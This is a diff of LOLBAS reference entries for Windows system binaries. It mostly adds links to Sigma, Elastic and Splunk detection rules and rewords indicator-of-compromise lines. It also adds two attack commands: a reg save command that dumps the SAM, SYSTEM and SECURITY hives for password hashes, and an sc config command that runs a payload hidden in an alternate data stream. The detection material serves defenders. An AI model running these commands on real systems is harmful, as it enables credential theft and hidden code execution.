- Code: https://raw.githubusercontent.com/LOLBAS-Project/LOLBAS/master/OSBinaries/Payload/PCW8E57.xml
|
- Code: https://raw.githubusercontent.com/LOLBAS-Project/LOLBAS/master/OSBinaries/Payload/PCW8E57.xml
|
||||||
Detection:
|
Detection:
|
||||||
- IOC:
|
- Sigma: https://github.com/SigmaHQ/sigma/blob/a04fbe2a99f1dcbbfeb0ee4957ae4b06b0866254/rules/windows/process_creation/win_possible_applocker_bypass.yml
|
||||||
|
- Elastic: https://github.com/elastic/detection-rules/blob/414d32027632a49fb239abb8fbbb55d3fa8dd861/rules/windows/defense_evasion_network_connection_from_windows_binary.toml
|
||||||
Resources:
|
Resources:
|
||||||
- Link: https://web.archive.org/web/20160322142537/https://cybersyndicates.com/2015/10/a-no-bull-guide-to-malicious-windows-trouble-shooting-packs-and-application-whitelist-bypass/
|
- Link: https://web.archive.org/web/20160322142537/https://cybersyndicates.com/2015/10/a-no-bull-guide-to-malicious-windows-trouble-shooting-packs-and-application-whitelist-bypass/
|
||||||
- Link: https://oddvar.moe/2017/12/21/applocker-case-study-how-insecure-is-it-really-part-2/
|
- Link: https://oddvar.moe/2017/12/21/applocker-case-study-how-insecure-is-it-really-part-2/
|
||||||
|
@ -38,8 +38,27 @@ Full_Path:
|
|||||||
Code_Sample:
|
Code_Sample:
|
||||||
- Code: https://raw.githubusercontent.com/LOLBAS-Project/LOLBAS/master/OSBinaries/Payload/Mshta_calc.sct
|
- Code: https://raw.githubusercontent.com/LOLBAS-Project/LOLBAS/master/OSBinaries/Payload/Mshta_calc.sct
|
||||||
Detection:
|
Detection:
|
||||||
|
- Sigma: https://github.com/SigmaHQ/sigma/blob/05c58b4892942c34bfa01e9ada88ef2663858e1c/rules/windows/process_creation/win_susp_mshta_pattern.yml
|
||||||
|
- Sigma: https://github.com/SigmaHQ/sigma/blob/08ca62cc8860f4660e945805d0dd615ce75258c1/rules/windows/process_creation/win_invoke_obfuscation_via_use_mhsta.yml
|
||||||
|
- Sigma: https://github.com/SigmaHQ/sigma/blob/08ca62cc8860f4660e945805d0dd615ce75258c1/rules/windows/process_creation/win_lethalhta.yml
|
||||||
|
- Sigma: https://github.com/SigmaHQ/sigma/blob/f4ac416ef44862930730f8b7f16362b0e987bc71/rules/windows/process_creation/win_shell_spawn_mshta.yml
|
||||||
|
- Sigma: https://github.com/SigmaHQ/sigma/blob/ff0f1a0222b5100120ae3e43df18593f904c69c0/rules/windows/process_creation/win_mshta_javascript.yml
|
||||||
|
- Sigma: https://github.com/SigmaHQ/sigma/blob/08ca62cc8860f4660e945805d0dd615ce75258c1/rules/windows/file_event/sysmon_susp_clr_logs.yml
|
||||||
|
- Sigma: https://github.com/SigmaHQ/sigma/blob/08ca62cc8860f4660e945805d0dd615ce75258c1/rules/windows/image_load/sysmon_susp_script_dotnet_clr_dll_load.yml
|
||||||
|
- Elastic: https://github.com/elastic/detection-rules/blob/f8f643041a584621e66cf8e6d534ad3db92edc29/rules/windows/defense_evasion_mshta_beacon.toml
|
||||||
|
- Elastic: https://github.com/elastic/detection-rules/blob/cc241c0b5ec590d76cb88ec638d3cc37f68b5d50/rules/windows/lateral_movement_dcom_hta.toml
|
||||||
|
- Elastic: https://github.com/elastic/detection-rules/blob/82ec6ac1eeb62a1383792719a1943b551264ed16/rules/windows/defense_evasion_suspicious_managedcode_host_process.toml
|
||||||
|
- Splunk: https://github.com/splunk/security_content/blob/08ed88bd88259c03c771c30170d2934ed0a8f878/stories/suspicious_mshta_activity.yml
|
||||||
|
- Splunk: https://github.com/splunk/security_content/blob/bee2a4cefa533f286c546cbe6798a0b5dec3e5ef/detections/endpoint/detect_mshta_renamed.yml
|
||||||
|
- Splunk: https://github.com/splunk/security_content/blob/18f63553a9dc1a34122fa123deae2b2f9b9ea391/detections/endpoint/suspicious_mshta_spawn.yml
|
||||||
|
- Splunk: https://github.com/splunk/security_content/blob/18f63553a9dc1a34122fa123deae2b2f9b9ea391/detections/endpoint/suspicious_mshta_child_process.yml
|
||||||
|
- Splunk: https://github.com/splunk/security_content/blob/bee2a4cefa533f286c546cbe6798a0b5dec3e5ef/detections/endpoint/detect_mshta_url_in_command_line.yml
|
||||||
|
- BlockRule: https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules
|
||||||
- IOC: mshta.exe executing raw or obfuscated script within the command-line
|
- IOC: mshta.exe executing raw or obfuscated script within the command-line
|
||||||
- IOC: Usage of HTA file
|
- IOC: General usage of HTA file
|
||||||
|
- IOC: msthta.exe network connection to Internet/WWW resource
|
||||||
|
- IOC: DotNet CLR libraries loaded into mshta.exe
|
||||||
|
- IOC: DotNet CLR Usage Log - mshta.exe.log
|
||||||
Resources:
|
Resources:
|
||||||
- Link: https://evi1cg.me/archives/AppLocker_Bypass_Techniques.html#menu_index_4
|
- Link: https://evi1cg.me/archives/AppLocker_Bypass_Techniques.html#menu_index_4
|
||||||
- Link: https://github.com/redcanaryco/atomic-red-team/blob/master/Windows/Payloads/mshta.sct
|
- Link: https://github.com/redcanaryco/atomic-red-team/blob/master/Windows/Payloads/mshta.sct
|
||||||
|
@ -38,7 +38,11 @@ Full_Path:
|
|||||||
Code_Sample:
|
Code_Sample:
|
||||||
- Code:
|
- Code:
|
||||||
Detection:
|
Detection:
|
||||||
- IOC: msiexec.exe getting files from Internet
|
- Sigma: https://github.com/SigmaHQ/sigma/blob/08ca62cc8860f4660e945805d0dd615ce75258c1/rules/windows/process_creation/win_susp_msiexec_web_install.yml
|
||||||
|
- Sigma: https://github.com/SigmaHQ/sigma/blob/08ca62cc8860f4660e945805d0dd615ce75258c1/rules/windows/process_creation/win_susp_msiexec_cwd.yml
|
||||||
|
- Elastic: https://github.com/elastic/detection-rules/blob/414d32027632a49fb239abb8fbbb55d3fa8dd861/rules/windows/defense_evasion_network_connection_from_windows_binary.toml
|
||||||
|
- Splunk: https://github.com/splunk/security_content/blob/18f63553a9dc1a34122fa123deae2b2f9b9ea391/detections/endpoint/uninstall_app_using_msiexec.yml
|
||||||
|
- IOC: msiexec.exe retrieving files from Internet
|
||||||
Resources:
|
Resources:
|
||||||
- Link: https://pentestlab.blog/2017/06/16/applocker-bypass-msiexec/
|
- Link: https://pentestlab.blog/2017/06/16/applocker-bypass-msiexec/
|
||||||
- Link: https://twitter.com/PhilipTsukerman/status/992021361106268161
|
- Link: https://twitter.com/PhilipTsukerman/status/992021361106268161
|
||||||
|
@ -17,6 +17,9 @@ Full_Path:
|
|||||||
Code_Sample:
|
Code_Sample:
|
||||||
- Code:
|
- Code:
|
||||||
Detection:
|
Detection:
|
||||||
|
- Sigma: https://github.com/SigmaHQ/sigma/blob/0a410010a2655bc6f2aae73b9fb3b2c00ed589f7/rules/windows/process_creation/win_susp_netsh_dll_persistence.yml
|
||||||
|
- Splunk: https://github.com/splunk/security_content/blob/2b87b26bdc2a84b65b1355ffbd5174bdbdb1879c/detections/endpoint/processes_launching_netsh.yml
|
||||||
|
- Splunk: https://github.com/splunk/security_content/blob/08ed88bd88259c03c771c30170d2934ed0a8f878/detections/deprecated/processes_created_by_netsh.yml
|
||||||
- IOC: Netsh initiating a network connection
|
- IOC: Netsh initiating a network connection
|
||||||
Resources:
|
Resources:
|
||||||
- Link: https://freddiebarrsmith.com/trix/trix.html
|
- Link: https://freddiebarrsmith.com/trix/trix.html
|
||||||
|
@ -24,7 +24,9 @@ Full_Path:
|
|||||||
Code_Sample:
|
Code_Sample:
|
||||||
- Code: https://raw.githubusercontent.com/LOLBAS-Project/LOLBAS/master/OSBinaries/Payload/file.rsp
|
- Code: https://raw.githubusercontent.com/LOLBAS-Project/LOLBAS/master/OSBinaries/Payload/file.rsp
|
||||||
Detection:
|
Detection:
|
||||||
- IOC:
|
- Sigma: https://github.com/SigmaHQ/sigma/blob/08ca62cc8860f4660e945805d0dd615ce75258c1/rules/windows/process_creation/win_susp_odbcconf.yml
|
||||||
|
- Elastic: https://github.com/elastic/detection-rules/blob/414d32027632a49fb239abb8fbbb55d3fa8dd861/rules/windows/defense_evasion_unusual_process_network_connection.toml
|
||||||
|
- Elastic: https://github.com/elastic/detection-rules/blob/414d32027632a49fb239abb8fbbb55d3fa8dd861/rules/windows/defense_evasion_network_connection_from_windows_binary.toml
|
||||||
Resources:
|
Resources:
|
||||||
- Link: https://gist.github.com/NickTyrer/6ef02ce3fd623483137b45f65017352b
|
- Link: https://gist.github.com/NickTyrer/6ef02ce3fd623483137b45f65017352b
|
||||||
- Link: https://github.com/woanware/application-restriction-bypasses
|
- Link: https://github.com/woanware/application-restriction-bypasses
|
||||||
|
@ -30,7 +30,7 @@ Full_Path:
|
|||||||
Code_Sample:
|
Code_Sample:
|
||||||
- Code:
|
- Code:
|
||||||
Detection:
|
Detection:
|
||||||
- IOC:
|
- Sigma: https://github.com/SigmaHQ/sigma/blob/ff0f1a0222b5100120ae3e43df18593f904c69c0/rules/windows/process_creation/win_indirect_cmd.yml
|
||||||
Resources:
|
Resources:
|
||||||
- Link: https://twitter.com/KyleHanslovan/status/912659279806640128
|
- Link: https://twitter.com/KyleHanslovan/status/912659279806640128
|
||||||
Acknowledgement:
|
Acknowledgement:
|
||||||
|
@ -16,7 +16,7 @@ Full_Path:
|
|||||||
Code_Sample:
|
Code_Sample:
|
||||||
- Code:
|
- Code:
|
||||||
Detection:
|
Detection:
|
||||||
- IOC:
|
- Sigma: https://github.com/SigmaHQ/sigma/blob/08ca62cc8860f4660e945805d0dd615ce75258c1/rules/windows/process_creation/win_indirect_cmd_compatibility_assistant.yml
|
||||||
Resources:
|
Resources:
|
||||||
- Link: https://twitter.com/pabraeken/status/991335019833708544
|
- Link: https://twitter.com/pabraeken/status/991335019833708544
|
||||||
Acknowledgement:
|
Acknowledgement:
|
||||||
|
@ -13,7 +13,10 @@ Commands:
|
|||||||
OperatingSystem: Windows 10,7
|
OperatingSystem: Windows 10,7
|
||||||
Full_Path:
|
Full_Path:
|
||||||
- Path: C:\Windows\system32\pnputil.exe
|
- Path: C:\Windows\system32\pnputil.exe
|
||||||
Code_Sample: https://github.com/LuxNoBulIshit/test.inf/blob/main/inf
|
Code_Sample:
|
||||||
|
- Code: https://github.com/LuxNoBulIshit/test.inf/blob/main/inf
|
||||||
|
Detection:
|
||||||
|
- Sigma: https://github.com/SigmaHQ/sigma/blob/a8a0d546f347febb0423aa920dbc10713cc1f92f/rules/windows/process_creation/process_creation_lolbins_suspicious_driver_installed_by_pnputil.yml
|
||||||
Acknowledgement:
|
Acknowledgement:
|
||||||
- Person: Hai Vaknin(Lux)
|
- Person: Hai Vaknin(Lux)
|
||||||
Handle: '@LuxNoBulIshit'
|
Handle: '@LuxNoBulIshit'
|
||||||
|
@ -17,7 +17,8 @@ Full_Path:
|
|||||||
Code_Sample:
|
Code_Sample:
|
||||||
- Code:
|
- Code:
|
||||||
Detection:
|
Detection:
|
||||||
- IOC:
|
- Sigma: https://github.com/SigmaHQ/sigma/blob/a38c0218765a89f5d18eadd49639c72a5d25d944/rules/windows/process_creation/win_susp_presentationhost_execution.yml
|
||||||
|
- IOC: Execution of .xbap files may not be common on production workstations
|
||||||
Resources:
|
Resources:
|
||||||
- Link: https://github.com/api0cradle/ShmooCon-2015/blob/master/ShmooCon-2015-Simple-WLEvasion.pdf
|
- Link: https://github.com/api0cradle/ShmooCon-2015/blob/master/ShmooCon-2015-Simple-WLEvasion.pdf
|
||||||
- Link: https://oddvar.moe/2017/12/21/applocker-case-study-how-insecure-is-it-really-part-2/
|
- Link: https://oddvar.moe/2017/12/21/applocker-case-study-how-insecure-is-it-really-part-2/
|
||||||
|
@ -31,7 +31,8 @@ Full_Path:
|
|||||||
Code_Sample:
|
Code_Sample:
|
||||||
- Code:
|
- Code:
|
||||||
Detection:
|
Detection:
|
||||||
- IOC: Print.exe getting files from internet
|
- Sigma: https://github.com/SigmaHQ/sigma/blob/08ca62cc8860f4660e945805d0dd615ce75258c1/rules/windows/process_creation/win_susp_print.yml
|
||||||
|
- IOC: Print.exe retrieving files from internet
|
||||||
- IOC: Print.exe creating executable files on disk
|
- IOC: Print.exe creating executable files on disk
|
||||||
Resources:
|
Resources:
|
||||||
- Link: https://twitter.com/Oddvarmoe/status/985518877076541440
|
- Link: https://twitter.com/Oddvarmoe/status/985518877076541440
|
||||||
|
@ -17,6 +17,7 @@ Full_Path:
|
|||||||
Code_Sample:
|
Code_Sample:
|
||||||
- Code:
|
- Code:
|
||||||
Detection:
|
Detection:
|
||||||
|
- Sigma: https://github.com/SigmaHQ/sigma/blob/c44b22b52fce406d45ddb6743a02b9ff8c62c7c6/rules/windows/process_creation/win_susp_psr_capture_screenshots.yml
|
||||||
- IOC: psr.exe spawned
|
- IOC: psr.exe spawned
|
||||||
- IOC: suspicious activity when running with "/gui 0" flag
|
- IOC: suspicious activity when running with "/gui 0" flag
|
||||||
Resources:
|
Resources:
|
||||||
|
@ -16,6 +16,7 @@ Full_Path:
|
|||||||
Code_Sample:
|
Code_Sample:
|
||||||
- Code:
|
- Code:
|
||||||
Detection:
|
Detection:
|
||||||
|
- Sigma: https://github.com/SigmaHQ/sigma/blob/08ca62cc8860f4660e945805d0dd615ce75258c1/rules/windows/process_creation/win_rasautou_dll_execution.yml
|
||||||
- IOC: rasautou.exe command line containing -d and -p
|
- IOC: rasautou.exe command line containing -d and -p
|
||||||
Resources:
|
Resources:
|
||||||
- Link: https://github.com/fireeye/DueDLLigence
|
- Link: https://github.com/fireeye/DueDLLigence
|
||||||
|
@ -11,15 +11,28 @@ Commands:
|
|||||||
Privileges: User
|
Privileges: User
|
||||||
MitreID: T1564.004
|
MitreID: T1564.004
|
||||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
||||||
|
- Command: reg save HKLM\SECURITY c:\test\security.bak && reg save HKLM\SYSTEM c:\test\system.bak && reg save HKLM\SAM c:\test\sam.bak
|
||||||
|
Description: Dump registry hives (SAM, SYSTEM, SECURITY) to retrieve password hashes and key material
|
||||||
|
Usecase: Dump credentials from the Security Account Manager (SAM)
|
||||||
|
Category: Credentials
|
||||||
|
Privileges: Administrator
|
||||||
|
MitreID: T1003.002
|
||||||
|
OperatingSystem: Windows Vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
||||||
Full_Path:
|
Full_Path:
|
||||||
- Path: C:\Windows\System32\reg.exe
|
- Path: C:\Windows\System32\reg.exe
|
||||||
- Path: C:\Windows\SysWOW64\reg.exe
|
- Path: C:\Windows\SysWOW64\reg.exe
|
||||||
Code_Sample:
|
Code_Sample:
|
||||||
- Code:
|
- Code:
|
||||||
Detection:
|
Detection:
|
||||||
|
- Sigma: https://github.com/SigmaHQ/sigma/blob/d9edc9f0e365257aa497cc7707e58f396088958e/rules/windows/process_creation/win_regedit_import_keys_ads.yml
|
||||||
|
- Sigma: https://github.com/SigmaHQ/sigma/blob/d9edc9f0e365257aa497cc7707e58f396088958e/rules/windows/process_creation/win_regedit_import_keys.yml
|
||||||
|
- Sigma: https://github.com/SigmaHQ/sigma/blob/9f27ab5426a0b061f1f2787e3dc947d6d75ad8c0/rules/windows/process_creation/win_grabbing_sensitive_hives_via_reg.yml
|
||||||
|
- Splunk: https://github.com/splunk/security_content/blob/bee2a4cefa533f286c546cbe6798a0b5dec3e5ef/detections/endpoint/attempted_credential_dump_from_registry_via_reg_exe.yml
|
||||||
|
- Elastic: https://github.com/elastic/detection-rules/blob/f6421d8c534f295518a2c945f530e8afc4c8ad1b/rules/windows/credential_access_dump_registry_hives.toml
|
||||||
- IOC: reg.exe writing to an ADS
|
- IOC: reg.exe writing to an ADS
|
||||||
Resources:
|
Resources:
|
||||||
- Link: https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f
|
- Link: https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f
|
||||||
|
- Link: https://pure.security/dumping-windows-credentials/
|
||||||
Acknowledgement:
|
Acknowledgement:
|
||||||
- Person: Oddvar Moe
|
- Person: Oddvar Moe
|
||||||
Handle: '@oddvarmoe'
|
Handle: '@oddvarmoe'
|
||||||
|
@ -26,6 +26,10 @@ Full_Path:
|
|||||||
Code_Sample:
|
Code_Sample:
|
||||||
- Code:
|
- Code:
|
||||||
Detection:
|
Detection:
|
||||||
|
- Sigma: https://github.com/SigmaHQ/sigma/blob/a04fbe2a99f1dcbbfeb0ee4957ae4b06b0866254/rules/windows/process_creation/win_possible_applocker_bypass.yml
|
||||||
|
- Elastic: https://github.com/elastic/detection-rules/blob/12577f7380f324fcee06dab3218582f4a11833e7/rules/windows/execution_register_server_program_connecting_to_the_internet.toml
|
||||||
|
- Splunk: https://github.com/splunk/security_content/blob/bc93e670f5dcb24e96fbe3664d6bcad92df5acad/docs/_stories/suspicious_regsvcs_regasm_activity.md
|
||||||
|
- Splunk: https://github.com/splunk/security_content/blob/bee2a4cefa533f286c546cbe6798a0b5dec3e5ef/detections/endpoint/detect_regasm_with_network_connection.yml
|
||||||
- IOC: regasm.exe executing dll file
|
- IOC: regasm.exe executing dll file
|
||||||
Resources:
|
Resources:
|
||||||
- Link: https://pentestlab.blog/2017/05/19/applocker-bypass-regasm-and-regsvcs/
|
- Link: https://pentestlab.blog/2017/05/19/applocker-bypass-regasm-and-regsvcs/
|
||||||
|
@ -24,6 +24,7 @@ Full_Path:
|
|||||||
Code_Sample:
|
Code_Sample:
|
||||||
- Code:
|
- Code:
|
||||||
Detection:
|
Detection:
|
||||||
|
- Sigma: https://github.com/SigmaHQ/sigma/blob/d9edc9f0e365257aa497cc7707e58f396088958e/rules/windows/process_creation/win_regedit_import_keys_ads.yml
|
||||||
- IOC: regedit.exe reading and writing to alternate data stream
|
- IOC: regedit.exe reading and writing to alternate data stream
|
||||||
- IOC: regedit.exe should normally not be executed by end-users
|
- IOC: regedit.exe should normally not be executed by end-users
|
||||||
Resources:
|
Resources:
|
||||||
|
@ -17,6 +17,8 @@ Full_Path:
|
|||||||
Code_Sample:
|
Code_Sample:
|
||||||
- Code:
|
- Code:
|
||||||
Detection:
|
Detection:
|
||||||
|
- Sigma: https://github.com/SigmaHQ/sigma/blob/d9edc9f0e365257aa497cc7707e58f396088958e/rules/windows/process_creation/win_regini_ads.yml
|
||||||
|
- Sigma: https://github.com/SigmaHQ/sigma/blob/d9edc9f0e365257aa497cc7707e58f396088958e/rules/windows/process_creation/win_regini.yml
|
||||||
- IOC: regini.exe reading from ADS
|
- IOC: regini.exe reading from ADS
|
||||||
Resources:
|
Resources:
|
||||||
- Link: https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f
|
- Link: https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f
|
||||||
|
@ -17,7 +17,7 @@ Full_Path:
|
|||||||
Code_Sample:
|
Code_Sample:
|
||||||
- Code:
|
- Code:
|
||||||
Detection:
|
Detection:
|
||||||
- IOC:
|
- IOC: Register-cimprovider.exe execution and cmdline DLL load may be supsicious
|
||||||
Resources:
|
Resources:
|
||||||
- Link: https://twitter.com/PhilipTsukerman/status/992021361106268161
|
- Link: https://twitter.com/PhilipTsukerman/status/992021361106268161
|
||||||
Acknowledgement:
|
Acknowledgement:
|
||||||
|
@ -24,7 +24,9 @@ Full_Path:
|
|||||||
Code_Sample:
|
Code_Sample:
|
||||||
- Code:
|
- Code:
|
||||||
Detection:
|
Detection:
|
||||||
- IOC:
|
- Sigma: https://github.com/SigmaHQ/sigma/blob/a04fbe2a99f1dcbbfeb0ee4957ae4b06b0866254/rules/windows/process_creation/win_possible_applocker_bypass.yml
|
||||||
|
- Elastic: https://github.com/elastic/detection-rules/blob/12577f7380f324fcee06dab3218582f4a11833e7/rules/windows/execution_register_server_program_connecting_to_the_internet.toml
|
||||||
|
- Splunk: https://github.com/splunk/security_content/blob/bee2a4cefa533f286c546cbe6798a0b5dec3e5ef/detections/endpoint/detect_regsvcs_with_network_connection.yml
|
||||||
Resources:
|
Resources:
|
||||||
- Link: https://pentestlab.blog/2017/05/19/applocker-bypass-regasm-and-regsvcs/
|
- Link: https://pentestlab.blog/2017/05/19/applocker-bypass-regasm-and-regsvcs/
|
||||||
- Link: https://oddvar.moe/2017/12/13/applocker-case-study-how-insecure-is-it-really-part-1/
|
- Link: https://oddvar.moe/2017/12/13/applocker-case-study-how-insecure-is-it-really-part-1/
|
||||||
|
@ -38,8 +38,18 @@ Full_Path:
|
|||||||
Code_Sample:
|
Code_Sample:
|
||||||
- Code:
|
- Code:
|
||||||
Detection:
|
Detection:
|
||||||
- IOC: regsvr32.exe getting files from Internet
|
- Sigma: https://github.com/SigmaHQ/sigma/blob/6fbce11094285e5ba13fe101b9cb70f5b1ece198/rules/windows/process_creation/win_susp_regsvr32_anomalies.yml
|
||||||
- IOC: regsvr32.exe executing scriptlet files
|
- Sigma: https://github.com/SigmaHQ/sigma/blob/6d56e400d209daa77a7900d950a7c587dc0cd2e5/rules/windows/network_connection/sysmon_regsvr32_network_activity.yml
|
||||||
|
- Sigma: https://github.com/SigmaHQ/sigma/blob/5951ad1d9a781a49d61df9af03c7b83ac67a0012/rules/windows/dns_query/dns_query_regsvr32_network_activity.yml
|
||||||
|
- Sigma: https://github.com/SigmaHQ/sigma/blob/08ca62cc8860f4660e945805d0dd615ce75258c1/rules/windows/process_creation/win_susp_regsvr32_flags_anomaly.yml
|
||||||
|
- Sigma: https://github.com/SigmaHQ/sigma/blob/08ca62cc8860f4660e945805d0dd615ce75258c1/rules/windows/file_event/sysmon_susp_clr_logs.yml
|
||||||
|
- Splunk: https://github.com/splunk/security_content/blob/86a5b644a44240f01274c8b74d19a435c7dae66e/detections/endpoint/detect_regsvr32_application_control_bypass.yml
|
||||||
|
- Elastic: https://github.com/elastic/detection-rules/blob/82ec6ac1eeb62a1383792719a1943b551264ed16/rules/windows/defense_evasion_suspicious_managedcode_host_process.toml
|
||||||
|
- Elastic: https://github.com/elastic/detection-rules/blob/12577f7380f324fcee06dab3218582f4a11833e7/rules/windows/execution_register_server_program_connecting_to_the_internet.toml
|
||||||
|
- IOC: regsvr32.exe retrieving files from Internet
|
||||||
|
- IOC: regsvr32.exe executing scriptlet (sct) files
|
||||||
|
- IOC: DotNet CLR libraries loaded into regsvr32.exe
|
||||||
|
- IOC: DotNet CLR Usage Log - regsvr32.exe.log
|
||||||
Resources:
|
Resources:
|
||||||
- Link: https://pentestlab.blog/2017/05/11/applocker-bypass-regsvr32/
|
- Link: https://pentestlab.blog/2017/05/11/applocker-bypass-regsvr32/
|
||||||
- Link: https://oddvar.moe/2017/12/13/applocker-case-study-how-insecure-is-it-really-part-1/
|
- Link: https://oddvar.moe/2017/12/13/applocker-case-study-how-insecure-is-it-really-part-1/
|
||||||
|
@ -24,7 +24,7 @@ Full_Path:
|
|||||||
Code_Sample:
|
Code_Sample:
|
||||||
- Code:
|
- Code:
|
||||||
Detection:
|
Detection:
|
||||||
- IOC: Replace.exe getting files from remote server
|
- IOC: Replace.exe retrieving files from remote server
|
||||||
Resources:
|
Resources:
|
||||||
- Link: https://twitter.com/elceef/status/986334113941655553
|
- Link: https://twitter.com/elceef/status/986334113941655553
|
||||||
- Link: https://twitter.com/elceef/status/986842299861782529
|
- Link: https://twitter.com/elceef/status/986842299861782529
|
||||||
|
@ -24,7 +24,7 @@ Full_Path:
|
|||||||
Code_Sample:
|
Code_Sample:
|
||||||
- Code:
|
- Code:
|
||||||
Detection:
|
Detection:
|
||||||
- IOC:
|
- Sigma: https://github.com/SigmaHQ/sigma/blob/08ca62cc8860f4660e945805d0dd615ce75258c1/rules/windows/process_creation/win_susp_rpcping.yml
|
||||||
Resources:
|
Resources:
|
||||||
- Link: https://github.com/vysec/RedTips
|
- Link: https://github.com/vysec/RedTips
|
||||||
- Link: https://twitter.com/vysecurity/status/974806438316072960
|
- Link: https://twitter.com/vysecurity/status/974806438316072960
|
||||||
|
@ -66,7 +66,11 @@ Full_Path:
|
|||||||
Code_Sample:
|
Code_Sample:
|
||||||
- Code:
|
- Code:
|
||||||
Detection:
|
Detection:
|
||||||
- IOC:
|
- Sigma: https://github.com/SigmaHQ/sigma/blob/08ca62cc8860f4660e945805d0dd615ce75258c1/rules/windows/network_connection/sysmon_rundll32_net_connections.yml
|
||||||
|
- Sigma: https://github.com/SigmaHQ/sigma/blob/08ca62cc8860f4660e945805d0dd615ce75258c1/rules/windows/process_creation/win_susp_rundll32_activity.yml
|
||||||
|
- Elastic: https://github.com/elastic/detection-rules/blob/12577f7380f324fcee06dab3218582f4a11833e7/rules/windows/defense_evasion_unusual_network_connection_via_rundll32.toml
|
||||||
|
- IOC: Outbount Internet/network connections made from rundll32
|
||||||
|
- IOC: Suspicious use of cmdline flags such as -sta
|
||||||
Resources:
|
Resources:
|
||||||
- Link: https://pentestlab.blog/2017/05/23/applocker-bypass-rundll32/
|
- Link: https://pentestlab.blog/2017/05/23/applocker-bypass-rundll32/
|
||||||
- Link: https://evi1cg.me/archives/AppLocker_Bypass_Techniques.html#menu_index_7
|
- Link: https://evi1cg.me/archives/AppLocker_Bypass_Techniques.html#menu_index_7
|
||||||
@ -75,6 +79,7 @@ Resources:
|
|||||||
- Link: https://bohops.com/2018/06/28/abusing-com-registry-structure-clsid-localserver32-inprocserver32/
|
- Link: https://bohops.com/2018/06/28/abusing-com-registry-structure-clsid-localserver32-inprocserver32/
|
||||||
- Link: https://github.com/sailay1996/expl-bin/blob/master/obfus.md
|
- Link: https://github.com/sailay1996/expl-bin/blob/master/obfus.md
|
||||||
- Link: https://github.com/sailay1996/misc-bin/blob/master/rundll32.md
|
- Link: https://github.com/sailay1996/misc-bin/blob/master/rundll32.md
|
||||||
|
- Link: https://nasbench.medium.com/a-deep-dive-into-rundll32-exe-642344b41e90
|
||||||
Acknowledgement:
|
Acknowledgement:
|
||||||
- Person: Casey Smith
|
- Person: Casey Smith
|
||||||
Handle: '@subtee'
|
Handle: '@subtee'
|
||||||
|
@ -17,7 +17,10 @@ Full_Path:
|
|||||||
Code_Sample:
|
Code_Sample:
|
||||||
- Code:
|
- Code:
|
||||||
Detection:
|
Detection:
|
||||||
- IOC: HKLM\SOFTWARE\Microsoft\Active Setup\Installed Components\YOURKEY
|
- Sigma: https://github.com/SigmaHQ/sigma/blob/6d2acb166070541925636d1d1273e46020e38387/rules/windows/registry_event/sysmon_runonce_persistence.yml
|
||||||
|
- Sigma: https://github.com/SigmaHQ/sigma/blob/08ca62cc8860f4660e945805d0dd615ce75258c1/rules/windows/process_creation/win_susp_runonce_execution.yml
|
||||||
|
- Elastic: https://github.com/elastic/detection-rules/blob/2926e98c5d998706ef7e248a63fb0367c841f685/rules/windows/persistence_run_key_and_startup_broad.toml
|
||||||
|
- IOC: Registy key add - HKLM\SOFTWARE\Microsoft\Active Setup\Installed Components\YOURKEY
|
||||||
Resources:
|
Resources:
|
||||||
- Link: https://twitter.com/pabraeken/status/990717080805789697
|
- Link: https://twitter.com/pabraeken/status/990717080805789697
|
||||||
- Link: https://cmatskas.com/configure-a-runonce-task-on-windows/
|
- Link: https://cmatskas.com/configure-a-runonce-task-on-windows/
|
||||||
|
@ -17,6 +17,8 @@ Full_Path:
|
|||||||
Code_Sample:
|
Code_Sample:
|
||||||
- Code:
|
- Code:
|
||||||
Detection:
|
Detection:
|
||||||
|
- Sigma: https://github.com/SigmaHQ/sigma/blob/08ca62cc8860f4660e945805d0dd615ce75258c1/rules/windows/process_creation/win_susp_runscripthelper.yml
|
||||||
|
- BlockRule: https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules
|
||||||
- IOC: Event 4014 - Powershell logging
|
- IOC: Event 4014 - Powershell logging
|
||||||
- IOC: Event 400
|
- IOC: Event 400
|
||||||
Resources:
|
Resources:
|
||||||
|
@ -11,13 +11,26 @@ Commands:
|
|||||||
Privileges: User
|
Privileges: User
|
||||||
MitreID: T1564.004
|
MitreID: T1564.004
|
||||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
||||||
|
- Command: sc config <existing> binPath="\"c:\\ADS\\file.txt:cmd.exe\" /c echo works > \"c:\ADS\works.txt\"" & sc start <existing>
|
||||||
|
Description: Modifies an existing service and executes the file stored in the ADS.
|
||||||
|
Usecase: Execute binary file hidden inside an alternate data stream
|
||||||
|
Category: ADS
|
||||||
|
Privileges: User
|
||||||
|
MitreID: T1564.004
|
||||||
|
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
||||||
Full_Path:
|
Full_Path:
|
||||||
- Path: C:\Windows\System32\sc.exe
|
- Path: C:\Windows\System32\sc.exe
|
||||||
- Path: C:\Windows\SysWOW64\sc.exe
|
- Path: C:\Windows\SysWOW64\sc.exe
|
||||||
Code_Sample:
|
Code_Sample:
|
||||||
- Code:
|
- Code:
|
||||||
Detection:
|
Detection:
|
||||||
- IOC: Services that gets created
|
- Sigma: https://github.com/SigmaHQ/sigma/blob/ff0f1a0222b5100120ae3e43df18593f904c69c0/rules/windows/process_creation/win_new_service_creation.yml
|
||||||
|
- Sigma: https://github.com/SigmaHQ/sigma/blob/08ca62cc8860f4660e945805d0dd615ce75258c1/rules/windows/process_creation/win_using_sc_to_change_sevice_image_path_by_non_admin.yml
|
||||||
|
- Sigma: https://github.com/SigmaHQ/sigma/blob/ff0f1a0222b5100120ae3e43df18593f904c69c0/rules/windows/process_creation/win_susp_service_path_modification.yml
|
||||||
|
